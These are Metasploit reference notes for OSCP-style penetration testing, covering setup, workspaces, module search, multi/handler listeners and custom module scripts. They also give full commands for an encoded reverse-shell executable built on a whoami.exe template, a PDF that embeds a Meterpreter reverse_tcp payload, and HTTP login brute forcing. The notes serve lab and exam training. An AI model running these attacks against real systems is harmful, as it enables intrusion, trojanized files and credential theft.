Metasploit

Framework for finding, configuring and running exploits, payloads and post-exploitation modules, backed by a database that keeps track of hosts, services and credentials across an engagement.

RESTRICTED DURING THE OSCP EXAM: Metasploit may be used against ONE machine only, and NOT against the AD set. The Multi Handler is the exception (see Listener below).

For generating payloads, see Msfvenom.
For Meterpreter sessions, see Meterpreter.

Update Metasploit

msfupdate is deprecated; on Kali the framework is updated through apt like any other package:

sudo apt update
sudo apt upgrade metasploit-framework

Start & Setup

Setup

Initialise the PostgreSQL database (first time only); check the connection afterwards with db_status inside msfconsole.

sudo service postgresql start
sudo msfdb init

Fix message: “To use retry middleware with Faraday v2.0+, install faraday-retry gem”

sudo gem install faraday-retry

Start the Metasploit console

sudo msfconsole -q

If msfconsole fails to start with Ruby gem or bundler errors, reinstall the gem bundle from the framework directory:

cd /usr/share/metasploit-framework
sudo gem install bundler:2.2.5
sudo bundle install

Workspaces

Use workspaces to keep the database results (hosts, services, credentials, loot) of different engagements separate; every db_nmap, scanner and report goes into the active workspace.

List workspaces

workspace

Use an existing workspace

workspace <workspace name>

Create a workspace

workspace -a <workspace name>

Delete a workspace

workspace -d <workspace name>

Modules

Auxiliary modules cover enumeration, scanners, fuzzing and sniffing; exploit modules deliver a payload; post modules run on an existing session.

Module paths are hierarchical:

  • <type>/<platform or OS>/<vendor or service>/<name>, e.g. exploit/windows/smb/ms17_010_eternalblue
  • <type>/<function>/<protocol>/<name>, e.g. auxiliary/scanner/smb/smb_version

show auxiliary
search type:auxiliary name:http

Listener

Netcat

Use with non-staged (inline) payloads such as windows/shell_reverse_tcp or linux/x64/shell_reverse_tcp. A staged payload (e.g. windows/meterpreter/reverse_tcp, note the extra slash) only sends a small stager first and needs the Multi Handler to deliver the stage; netcat will just receive garbage.

sudo nc -lnvp 443

Multi Handler

The Multi Handler is allowed on ALL machines during the OSCP exam, but any Meterpreter payload IS RESTRICTED to one machine.

  • -j: run in background (use jobs command)
  • -z: do not automatically interact with the session

Resource scripts

Write the msfconsole commands to a file, one per line, and pass it with -r; msfconsole runs them in order right after starting. For a handler, PAYLOAD, LHOST and LPORT must match what msfvenom was given exactly.

sudo msfconsole -q -r <script name>.rc

Basic example

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set ExitOnSession false
exploit -j -z
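Putting the resource-script idea and the basic handler together, here is an added example (written for these notes, not code from Metasploit) that renders the handler commands from PAYLOAD, LHOST and LPORT, rejects an invalid port or payload name before msfconsole ever starts, and then launches msfconsole on the result. The function names and the /tmp/handler_<port>.rc output path are arbitrary choices for this example.

```shell
#!/bin/sh
# Added example, not from the original notes: build the multi/handler
# resource script from parameters, validating them first, then run it.
# Helper names and the /tmp output path are arbitrary choices.

# Print the multi/handler commands for PAYLOAD, LHOST and LPORT to stdout.
# Returns 1 on an obviously wrong port or payload name; a typo here
# otherwise only shows up when the callback never arrives.
handler_rc() {
    payload="$1"
    lhost="$2"
    lport="$3"

    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be a number, got '$lport'" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "LPORT out of range: $lport" >&2
        return 1
    fi
    # Metasploit payload names always carry a platform prefix (windows/..., linux/...).
    case "$payload" in
        */*) ;;
        *) echo "PAYLOAD should look like linux/x64/meterpreter/reverse_tcp, got '$payload'" >&2; return 1 ;;
    esac

    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# Write the script to $4 and print its path; remove a half-written file on error.
write_handler_rc() {
    out="$4"
    if handler_rc "$1" "$2" "$3" > "$out"; then
        echo "$out"
    else
        rm -f "$out"
        return 1
    fi
}

# Usage: sh handler.sh linux/x64/meterpreter/reverse_tcp tun0 4444
# msfconsole is only started when exactly three arguments are given, so the
# file can also be sourced for its functions.
if [ "$#" -eq 3 ]; then
    rc=$(write_handler_rc "$1" "$2" "$3" "/tmp/handler_$3.rc") || exit 1
    sudo msfconsole -q -r "$rc"
fi
```

Because the handler keeps running with ExitOnSession false and -j -z, the same script serves every callback on that port; switch to sessions -l once the first shell arrives.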

Advanced example

The advanced options (show advanced) let the handler encode the stage and run post modules automatically. EnableStageEncoding with StageEncoder encodes the stage (the second part of a staged payload) before it is sent, which changes what goes over the wire but is no reliable AV evasion: x86/shikata_ga_nai is well known to every scanner. EXITFUNC thread makes the payload exit its own thread instead of the whole host process. Only one AutoRunScript can be set (a later set overwrites the earlier one); to chain two, put the first in InitialAutoRunScript, which runs before AutoRunScript.

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
show advanced
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set EXITFUNC thread
set ExitOnSession false
set InitialAutoRunScript post/windows/manage/migrate
set AutoRunScript post/windows/gather/enum_logged_on_users
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set Workspace test
exploit -j -z
jobs
jobs -i <job id>
kill <job id>

Example for TCP listener on Kali, Meterpreter

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j -z
sessions -l -v
sessions -i <session_id>

Vulnerabilities & Exploits

Search vulnerabilities/exploits

search -h

Search for a specific vulnerability

search ms03-026
search cve:2021 type:exploit
search cve:2021 type:exploit rank:excellent
search browser chrome type:exploit date:2021

Exploit a vulnerability

use exploit/windows/dcerpc/ms03_026_dcom

Show payloads

Exploit modules need a payload; if none is set, the module's default payload is used (visible in show options). show payloads lists only the payloads compatible with the current module.

show payloads
set payload windows/shell_reverse_tcp

Generating a payload

For generating payloads, see Msfvenom.

use payload/windows/shell_reverse_tcp
generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe LHOST=$KALI_IP LPORT=$LISTENER_PORT

# Datastore options (LHOST=, LPORT=) go after the switches. Without -k the template binary is overwritten and no longer works as whoami.

Show module options

Most modules need input (target address and port, payload settings). show options lists the required and optional settings with their current values; show advanced lists the less common ones.

show options
show advanced

Set module options

set RHOST x.x.x.x
show options

Set module options – globally

setg RHOSTS x.x.x.1-254
setg LHOST tun0

Run the module

run and exploit are equivalent. With a Meterpreter payload a successful run returns a Meterpreter session on the target; with a shell payload, a plain shell session.

run
exploit

For Meterpreter sessions, see Meterpreter.

Nmap

Execute Nmap within Metasploit and save the results into Metasploit’s database.

db_nmap <nmap options>
db_nmap -A -Pn x.x.x.x

Hosts Information

Services

services -h
services
services -p 80

List the services on port 80 and set RHOSTS of the current module to the matching hosts.

services -p 80 --rhosts

Hosts

hosts -h
hosts

Build Metasploit Modules

Building a Module

msfconsole loads custom modules from ~/.msf4/modules of the user that runs it, so with sudo msfconsole that is /root/.msf4/modules. Mirror the framework's directory layout below it (e.g. ~/.msf4/modules/auxiliary/scanner/http/) and run reload_all in the console to pick up new or changed files.
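As an added example (not a module that ships with Metasploit), the script below creates that directory layout and drops in a minimal auxiliary scanner that records each host's HTTP Server header in the database. The module name auxiliary/scanner/http/example_server_header, its MATCH option and the MSF_MODULES_DIR override are made up for this example.

```shell
#!/bin/sh
# Added example, not from the original notes: install a small custom
# auxiliary module into the per-user module directory. The module itself
# (name, options, behaviour) is hypothetical; the directory layout is what
# msfconsole's loader expects.

# Per-user module root. Override MSF_MODULES_DIR to install elsewhere
# (for sudo msfconsole this has to be /root/.msf4/modules).
msf_modules_dir() {
    printf '%s\n' "${MSF_MODULES_DIR:-$HOME/.msf4/modules}"
}

# $1 = module path exactly as it will be used in msfconsole,
#      e.g. auxiliary/scanner/http/example_server_header
# Writes <modules dir>/<path>.rb and prints the file name.
install_example_module() {
    relpath="$1"
    case "$relpath" in
        auxiliary/*|exploit/*|post/*|payload/*|encoder/*|nop/*|evasion/*) ;;
        *) echo "module path must start with its type, e.g. auxiliary/...: $relpath" >&2; return 1 ;;
    esac
    dest="$(msf_modules_dir)/$relpath.rb"
    mkdir -p "$(dirname "$dest")"
    cat > "$dest" <<'RUBY'
##
# Hypothetical example module written for these notes; it does not ship
# with Metasploit. Requests TARGETURI on every host in RHOSTS, stores the
# HTTP Server header as the service banner and prints hosts whose header
# matches MATCH (case-insensitive).
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'HTTP Server Header Scanner (example)',
        'Description' => %q{
          Records the HTTP Server header of each target as its service
          banner and flags the targets whose header matches MATCH.
        },
        'Author'      => ['example'],
        'License'     => MSF_LICENSE
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path to request', '/']),
        OptString.new('MATCH', [false, 'Regex to flag in the Server header', 'apache|nginx|iis'])
      ]
    )
  end

  def run_host(ip)
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    unless res
      vprint_error("#{ip}:#{rport} - no HTTP response")
      return
    end

    server = res.headers['Server'].to_s
    # Stored in the database: visible afterwards with services -p <port>.
    report_service(host: ip, port: rport, proto: 'tcp', name: 'http', info: server)

    match = datastore['MATCH'].to_s
    if !match.empty? && server =~ Regexp.new(match, Regexp::IGNORECASE)
      print_good("#{ip}:#{rport} - Server: #{server}")
    else
      vprint_status("#{ip}:#{rport} - Server: #{server.empty? ? '(none)' : server}")
    end
  end
end
RUBY
    printf '%s\n' "$dest"
}

# Usage: sh install_module.sh --install
# then inside msfconsole:
#   reload_all
#   use auxiliary/scanner/http/example_server_header
#   set RHOSTS 10.10.10.0/24
#   run
if [ "${1:-}" = "--install" ]; then
    install_example_module auxiliary/scanner/http/example_server_header
fi
```

Keep the path under ~/.msf4/modules identical to the module name you want to type in the console; a file placed in the wrong subdirectory loads under a different name or not at all, and reload_all reports the parse errors of a broken module.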

Generate malicious PDF file for Windows

search type:exploit platform:windows adobe pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
info
set payload windows/meterpreter/reverse_tcp
show options
set INFILENAME chapter1.pdf
set FILENAME chapter1.pdf
set LHOST x.x.x.x
show options
exploit

# Metasploit writes the file to /root/.msf4/local/chapter1.pdf (~/.msf4/local when not run with sudo).
# INFILENAME is the benign PDF the payload gets embedded in, FILENAME the output name. Start a multi/handler with the same PAYLOAD, LHOST and LPORT before the file is opened on the target.

Quit Metasploit

exit

Bruteforce HTTP Basic Auth (e.g. an Oracle WebLogic console)

http_login tries every user/password pair against the HTTP authentication of the target. If the module cannot locate the protected path on its own, set AUTH_URI to it, and match RPORT and SSL to the service.

echo "weblogic" > /root/users.txt

msfconsole
use auxiliary/scanner/http/http_login
set user_file /root/users.txt
set pass_file /usr/share/wordlists/rockyou.txt
set rhosts x.x.x.x
set rport 7879
set SSL true
set threads 5
set stop_on_success true
exploit